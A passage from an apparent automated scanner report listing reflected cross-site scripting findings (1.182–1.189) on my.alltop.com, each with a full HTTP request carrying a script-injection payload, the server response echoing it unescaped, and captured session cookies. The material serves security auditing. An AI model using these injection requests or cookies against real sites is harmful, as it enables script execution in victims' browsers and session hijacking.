GET /alpha/o/%22ns99c44"><script>alert(1)</script>0d4a812929a=%22netsparker(0x0001D1) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%22ns99c44"><script>alert(1)</script>0d4a812929a=%22netsparker(0x0001D1)" method="post" accept-charset="utf-8">
...[SNIP]...

1.182. http://my.alltop.com/alpha/o/%22ns=%22netsparker(0x0001D1) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%22ns=%22netsparker(0x0001D1)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf274"><script>alert(1)</script>0e0e1b8856b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o/%22ns=%22netsparker(0x0001D1)?cf274"><script>alert(1)</script>0e0e1b8856b=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:49 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:50 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:50 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%22ns=%22netsparker(0x0001D1)?cf274"><script>alert(1)</script>0e0e1b8856b=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.183. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e246"><script>alert(1)</script>9d5efa3b171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o8e246"><script>alert(1)</script>9d5efa3b171/%2522ns%253D%2522netsparker%25280x0001D5%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o8e246"><script>alert(1)</script>9d5efa3b171/%2522ns%253D%2522netsparker%25280x0001D5%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.184. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a20"><script>alert(1)</script>ac00e0ba843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)79a20"><script>alert(1)</script>ac00e0ba843 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)79a20"><script>alert(1)</script>ac00e0ba843" method="post" accept-charset="utf-8">
...[SNIP]...

1.185. http://my.alltop.com/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21760"><script>alert(1)</script>da0f601f8e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)?21760"><script>alert(1)</script>da0f601f8e5=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/o/%2522ns%253D%2522netsparker%25280x0001D5%2529)?21760"><script>alert(1)</script>da0f601f8e5=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.186. http://my.alltop.com/alpha/p ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The value of the '"--></style></script><script>netsparker(0x000208)</script> request parameter is copied into the HTML document as plain text between tags. The payload 774df<script>alert(1)</script>a6b0c385715 was submitted in the '"--></style></script><script>netsparker(0x000208)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p?'"--></style></script><script>netsparker(0x000208)</script>774df<script>alert(1)</script>a6b0c385715 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>774df<script>alert(1)</script>a6b0c385715" method="post" accept-charset="utf-8">
...[SNIP]...

1.187. http://my.alltop.com/alpha/p [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504f0"><script>alert(1)</script>fa40e7b35cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p504f0"><script>alert(1)</script>fa40e7b35cd HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:08 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p504f0"><script>alert(1)</script>fa40e7b35cd" method="post" accept-charset="utf-8">
...[SNIP]...

1.188. http://my.alltop.com/alpha/p [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba66d"><script>alert(1)</script>08b950fdec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p?ba66d"><script>alert(1)</script>08b950fdec=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:08 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:08 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/p?ba66d"><script>alert(1)</script>08b950fdec=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.189. http://my.alltop.com/alpha/p [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/p

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c29"><script>alert(1)</script>130d5be8299 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/p?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000181)%3C/script%3E20c29"><script>alert(1)</script>130d5be8299 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
